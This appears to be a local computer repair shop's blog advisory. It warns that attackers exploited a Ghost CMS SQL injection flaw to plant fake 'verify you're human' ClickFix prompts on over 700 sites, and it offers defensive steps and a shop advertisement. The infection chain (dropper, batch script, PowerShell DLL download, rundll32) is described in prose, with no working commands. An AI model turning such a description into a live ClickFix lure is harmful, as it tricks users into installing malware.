Security researchers disclosed this week that attackers have hijacked more than 700 legitimate websites — including Harvard, Oxford, Auburn University, and DuckDuckGo — and rigged them to push Windows malware through fake 'verify you're human' pop-ups. The catch: the malware only installs if the visitor copies and pastes a command into Windows themselves, which is exactly what the fake page tells them to do. It's a national story, but the trick works on any Windows PC, including ones in York County living rooms and small offices.
What happened
Researchers at XLab (the threat intelligence arm of Chinese security firm Qianxin) revealed that attackers are exploiting CVE-2026-26980, an SQL injection vulnerability in Ghost CMS's Content API that allows an unauthenticated attacker to read arbitrary data from the database — a flaw that was patched back in February 2026 in version 6.19.1 . The problem is that thousands of websites never installed the patch.
In all, the campaign has compromised more than 700 websites, spanning universities, blockchain, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology sectors — and the fact that legitimate websites have been breached could further increase the success rate of the attacks . According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.
How the trick works on Windows users
This is a social-engineering attack known as 'ClickFix.' The injected script loads a second-stage ClickFix flow, presenting visitors with a fake Cloudflare or CAPTCHA verification dialog. Instead of a normal checkbox, the page instructs users to copy-paste a command into the Windows Run dialog or PowerShell, effectively tricking them into installing malware on their own systems.
The command serves as a dropper for delivering a ZIP archive and extracts from it a Windows batch script and runs it. The script, for its part, executes a PowerShell command to download a DLL file from a remote domain, launch it using rundll32.exe, and open a bogus web page to the user as a distraction. XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
Because the user types or pastes the command themselves, traditional antivirus often doesn't flag it until the payload actually lands — by which point the attacker may already have a foothold. If you suspect a machine has already executed one of these commands, getting it to a shop that can clean out malware and check for persistence is the safest move.
Why this one is more dangerous than the average scam page
Most malware lures show up on shady websites. This one is different. This campaign is likely to be particularly effective because the instructions are framed as harmless technical steps such as 'verify you're human,' 'fix your connection,' or 'continue to the site' — and the content appears on websites users already trust.
Worse, the attack is hard to spot after the fact. Final payloads are often 'fileless,' meaning they're seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they're loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. Once a ClickFix payload is on a PC it can quietly steal saved browser passwords, banking sessions, and crypto wallets, or open the door to ransomware. If important files are encrypted or disappear afterward, a drive recovery may be the only way to get them back.
What to do right now
The single most important rule: never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action's purpose . Specifically, if any web page ever asks you to press Windows+R, open PowerShell, or paste something into the Command Prompt to 'prove you're human' or 'fix' a page — close the tab. That is never a legitimate request.
A few other practical steps:
- Run a full Microsoft Defender scan today, especially if anyone in the household has clicked through CAPTCHA-style prompts recently. - Change passwords for banking, email, and any site you've logged into in the past month from the affected machine — and turn on multi-factor authentication where you can. - Check Task Scheduler and the Startup tab in Task Manager for entries you don't recognize. ClickFix payloads frequently add persistence here. - If the PC has been acting strange — pop-ups, browser redirects, unfamiliar processes, or sluggish performance — bring it in for a hands-on diagnostic rather than hoping it clears up.
What This Means for York, PA
York County residents and small businesses are squarely in the target zone for this one — the compromised sites include major universities and a popular search engine, so anyone in the area browsing normally could land on a poisoned page. If you've pasted any 'verification' command into Windows in the last few weeks, bring the PC into York Computer Repair at 2069 Carlisle Rd so we can scan it and confirm nothing was left behind.
Sources
- Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
- 700+ education and tech websites hijacked in huge ClickFix malware campaign
- Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
- Think before you Click(Fix): Analyzing the ClickFix social engineering technique